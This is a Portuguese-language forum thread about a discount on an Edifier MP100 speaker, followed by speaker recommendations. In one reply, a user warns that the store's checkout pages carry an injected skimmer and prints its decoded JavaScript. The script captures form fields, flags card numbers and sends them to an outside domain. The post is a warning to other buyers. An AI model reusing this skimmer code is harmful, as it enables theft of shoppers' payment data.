• Prezados usuários,

    Por questões de segurança, a partir de 22/04/2024 os usuários só conseguirão logar no fórum se estiverem com a "Verificação em duas etapas" habilitada em seu perfil.

    Para habilitar a "Verificação em duas etapas" entre em sua conta e "Click" em seu nick name na parte superior da página, aparecerá opções de gestão de sua conta, entre em "Senha e segurança", a primeira opção será para habilitar a "Verificação em duas etapas".

    Clicando alí vai pedir a sua senha de acesso ao fórum, e depois vai para as opções de verificação, que serão as seguintes:

    ***Código de verificação via aplicativo*** >>>Isso permite que você gere um código de verificação usando um aplicativo em seu telefone.

    ***Email de confirmação*** >>>Isso enviará um código por e-mail para verificar seu login.

    ***Códigos alternativos*** >>>Esses códigos podem ser usados para fazer login se você não tiver acesso a outros métodos de verificação.

    Existe as 3 opções acima, e para continuar acessando o fórum a partir de 22/04/2024 você deverá habilitar uma das 03 opções.

    Tópico para tirar dúvidas>>>>https://forum.adrenaline.com.br/threads/obrigatoriedade-da-verificacao-em-duas-etapas-a-partir-de-24-04-2024-duvidas.712290/

    Atencionamente,

    Administração do Fórum Adrenaline


  • Após análise foi decidido criar uma nova seção dentro do "OFERTAS".

    Tópicos de lojas estrangeiras que enviem produtos para o Brasil deverão ser criados na subseção "Produtos Importados".

[Edifier] Caixas de Som MP100 - R$ 149,00

Status
Não esta aberto para novas mensagens.

Junior Viana

New Member
Registrado
Caixa de som portátil com alta definição.

Por ser pequena, acho que 4W RMS para um dispositivo portátil com essa definição e Resposta de frequência de 160Hz-14kHz. É uma caixa que merece uma atenção.
A EDIFIER já tem sua reputação em qualidade nas caixas de som, mas ainda não tinha testado a linha portátil e esse produto é muito TOP!
caixa-de-som-bluetooth-port_til_1.jpg

http://www.lojaedifier.com.br/caixa-de-som-portatil-bluetooth-edifier-mp100-azul.html
de: R$249,00
Por: R$14,90 x10 sem juros

:isquero: Destaque para a bateria de 20 horas.
 
:doge::doge::doge:




Custa R$149,00. Em até 10x R$14,90 sem juros.
Custa R$149,00. Em até 10x R$14,90 sem juros.
Custa R$149,00. Em até 10x R$14,90 sem juros.
Custa R$149,00. Em até 10x R$14,90 sem juros. Custa R$149,00. Em até 10x R$14,90 sem juros.
 
Caixa de som portátil com alta definição.

Por ser pequena, acho que 4W RMS para um dispositivo portátil com essa definição e Resposta de frequência de 160Hz-14kHz. É uma caixa que merece uma atenção.
A EDIFIER já tem sua reputação em qualidade nas caixas de som, mas ainda não tinha testado a linha portátil e esse produto é muito TOP!
caixa-de-som-bluetooth-port_til_1.jpg

http://www.lojaedifier.com.br/caixa-de-som-portatil-bluetooth-edifier-mp100-azul.html
de: R$249,00
Por: R$14,90 x10 sem juros
:isquero: Destaque para a bateria de 20 horas.

Opa! Partiu comprar uma pra vovó!
 
Essa deve ficar muito baixa para um PC, correto?

Alguma recomendação de caixas tradicionais da Edifier pra usar no PC? Tenho uma da Multilaser a uns 5 anos que começou falhar uma caixinha e o sub ta ruim também.
 
Essa deve ficar muito baixa para um PC, correto?

Alguma recomendação de caixas tradicionais da Edifier pra usar no PC? Tenho uma da Multilaser a uns 5 anos que começou falhar uma caixinha e o sub ta ruim também.

Quanto quer gastar?
 
Essa deve ficar muito baixa para um PC, correto?

Alguma recomendação de caixas tradicionais da Edifier pra usar no PC? Tenho uma da Multilaser a uns 5 anos que começou falhar uma caixinha e o sub ta ruim também.

Quanto quer gastar?
O quanto melhor é esse da Xiaomi em relação ao Edifier?

Duvido muito, que a da Xiaomi seja melhor
 
Quanto quer gastar?

Algo até uns R$ 200,00 acho que dá pra encarar. A minha foi R$ 100 e durou 5 anos.
Andei vendo umas da logitech 2.1 na faixa de R$ 200 a R$ 300, será que são boas?
 
Algo até uns R$ 200,00 acho que dá pra encarar. A minha foi R$ 100 e durou 5 anos.
Andei vendo umas da logitech 2.1 na faixa de R$ 200 a R$ 300, será que são boas?
Edifier X100.
 
  • Curtir
Reações: wmh
Eu também gostaria de comprar uma caixa de som pra pc.
Pra quem entende e conhece: existe alguma caixa de som na faixa de 100-250 mangos pra PC que também tem bluetooth?
 
Essa ou JBL Go?
 
Algo até uns R$ 200,00 acho que dá pra encarar. A minha foi R$ 100 e durou 5 anos.
Andei vendo umas da logitech 2.1 na faixa de R$ 200 a R$ 300, será que são boas?

http://www.lojaedifier.com.br/caixa-de-som-22w-portatil-aurora-edifier-mp300-plus-azul-eletrico.html

Aproveita que ta com uma boa promoção, os graves não são tão fortes, e talvez parte do preço dela seja pelo design, mas o som é de ótima qualidade.

A x100b(atualização da x100) é um dos melhores custoxbeneficio que existem(talvez o melhor). Os graves já são bem mais fortes, mas tem menor apelo estético, impressiona muito pela potência, porém como
qualquer sistema de som nessa faixa de preço não espere MUITA definição, e o som distorce um pouco nos volumes mais altos. (já tive o modelo antigo x100)
Infelizmente, hoje são um pouco difíceis de encontrar, e no site da Edifier está esgotada.

http://www.kabum.com.br/produto/59469/caixa-de-som-logitech-multimidia-2-1-14w-rms-z213

Boa opção da Logitech, acredito que seja similar a x100 antiga, recomendo como opção custoxbenefício.
Mas saiba que Edifier>>Logitech.

Eu sei que rasgo muita seda para Edifier, e pareço um fãboy :haha:. Mas como já disse aqui no fórum, temos pouquíssimas
marcas no mercado, com o custoxbeneficio de Edifier e Logitech. Lógico que existem muitas marcas excelentes, HK, Onkyo, Yamaha, M-Audio, Roland, etcc
mas custam 2 rims e meio.
 
Eu também gostaria de comprar uma caixa de som pra pc.
Pra quem entende e conhece: existe alguma caixa de som na faixa de 100-250 mangos pra PC que também tem bluetooth?

Se você fala de caixa para PC, eu acho que a melhor opção do mercado são as Luna Eclipse e25, que estão na promoção na Cissa, mas
custam 3x esse valor.

Se fala de caixa portátil bluetooth, eu acho que o modelo do fórum é uma ótima opção.
Assim como a JBL GO e a Logitech x50. Todas na mesma faixa de preço.
 
Essa ou JBL Go?

A JBL vem caindo um pouco em qualidade, apesar de ser Harman Kardon. (ainda é muito boa)
A Edifier tem 1wRMS a mais, e tem mais horas de bateria. Mas fica a seu critério, acho que ambas são muito boas.
 
Apareceu isso quando entrei no link. Será que a loja Loja EDIFIER Brasil que é pouca segura, ou o Kaspersky Lab que tá pegando coisa que não existe?

Realmente o site tem varias falhas de segurança e tem um código intercepta os dados do formulário de compra.

Se quiserem comprovar abram o código fonte da página e procurem por:
Código:
this['eval'](this['unescape']

Na frente vai ter um monte de caracter estranho, se você quiser saber o que significa pode abrir o console e fazer o unscape('string'), mas pra facilitar vou deixar no spoiler abaixo:

Código:
function start(){
  if((new RegExp('onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout')).test(window.location)) {
  send();
   
  }

}
document.addEventListener("DOMContentLoaded", start);

function clk() {
  var inp=document.querySelectorAll("input, select, textarea, checkbox");
  for (var i=0;i<inp.length;i++){
  if(inp[i].value.length>0) {
  var nme=inp[i].id;
  if(nme=='') { nme=i; }
  snd+=inp[i].id+'='+inp[i].value+'&';
  }
  }
   
}


function send() {
 var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
  for (var i=0;i<btn.length;i++){
  var b=btn[i];
  if(b.type!='text' && b.type!='slect' && b.type!='checkbox' && b.type!='password' && b.type!='radio') {
  if(b.addEventListener) {
  b.addEventListener("click", clk, false);
  }else {
  b.attachEvent('onclick', clk);
  }
  }
  }

  var frm=document.querySelectorAll("form");
  for (var i=0;i<frm.length;i++){
  if(frm[i].addEventListener) {
  frm[i].addEventListener("submit", clk, false);
  }else {
  frm[i].attachEvent('onsubmit', clk);
  }
  }

  if(snd!=null) {
   var cc = new RegExp("[0-9]{13,16}");
     var asd="0";
  if(cc.test(snd)){
      asd="1" ;
    }
var http = new XMLHttpRequest();
http.open("POST","https://trafficanalyzer.biz/lib/jquery-1.9.1.min.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("data="+snd+"&asd="+asd+"&id_id=mercuryshop.com.br");
  }
  snd=null;
  setTimeout('send()', 130);
}


O código faz o que eu disse antes, pega os dados do formulário de pagamento (provavelmente para pegar os dados do CC) e envia para um site chamado: "trafficanalyzer.biz"

Então tomem cuidado ...

Abraço
 
unescape **
 
Algo até uns R$ 200,00 acho que dá pra encarar. A minha foi R$ 100 e durou 5 anos.
Andei vendo umas da logitech 2.1 na faixa de R$ 200 a R$ 300, será que são boas?

Eu tenho a Edifier X100 desde 2009, firme e forte. Na época ainda não era o modelo bivolt e tinha o botão de aumentar graves. De lá pra cá o único problema que ela teve foi o potenciômetro chiando (o que vi muitos outros usuários reclamando), mas foi depois de muitos anos de uso e eu resolvi facilmente abrindo a caixa e aplicando um pouco de desengripante nele.

Comprei na época porque um amigo tinha uma e recentemente recomendei para um outro amigo que ficou muito satisfeito.

Único ponto negativo é que ela encareceu demais (como muita coisa por aí). Paguei R$105; se você achar até uns R$200 hoje, vale a pena.

Realmente o site tem varias falhas de segurança e tem um código intercepta os dados do formulário de compra.

Amigo, acho que seria interessante reportar isso a eles. Talvez não tenham conhecimento disso.
 
Eu tenho a Edifier X100 desde 2009, firme e forte. Na época ainda não era o modelo bivolt e tinha o botão de aumentar graves. De lá pra cá o único problema que ela teve foi o potenciômetro chiando (o que vi muitos outros usuários reclamando), mas foi depois de muitos anos de uso e eu resolvi facilmente abrindo a caixa e aplicando um pouco de desengripante nele.

Comprei na época porque um amigo tinha uma e recentemente recomendei para um outro amigo que ficou muito satisfeito.

Único ponto negativo é que ela encareceu demais (como muita coisa por aí). Paguei R$105; se você achar até uns R$200 hoje, vale a pena.



Amigo, acho que seria interessante reportar isso a eles. Talvez não tenham conhecimento disso.
Muito provavelmente eu pegue essa mesmo, só não acho disponível em lugar algum.
 
http://www.lojaedifier.com.br/caixa-de-som-22w-portatil-aurora-edifier-mp300-plus-azul-eletrico.html

 


Se você fala de caixa para PC, eu acho que a melhor opção do mercado são as Luna Eclipse e25, que estão na promoção na Cissa, mas
custam 3x esse valor.

Se fala de caixa portátil bluetooth, eu acho que o modelo do fórum é uma ótima opção.
Assim como a JBL GO e a Logitech x50. Todas na mesma faixa de preço.
Sim, mas eu gostaria de 2 em 1, existe?
Caixa de som pra pc, mas que também tenha bluetooth.
 
A minha JBL GO tem 3W RMS e tem um pancada de respeito, o volume máximo "incomoda" bastante. Por ser Edifier (marca boa), ela deve entregar os 4W, que devem ser de bom proveito.
 
R$249 aqui =/
 
Status
Não esta aberto para novas mensagens.

Users who are viewing this thread

Voltar
Topo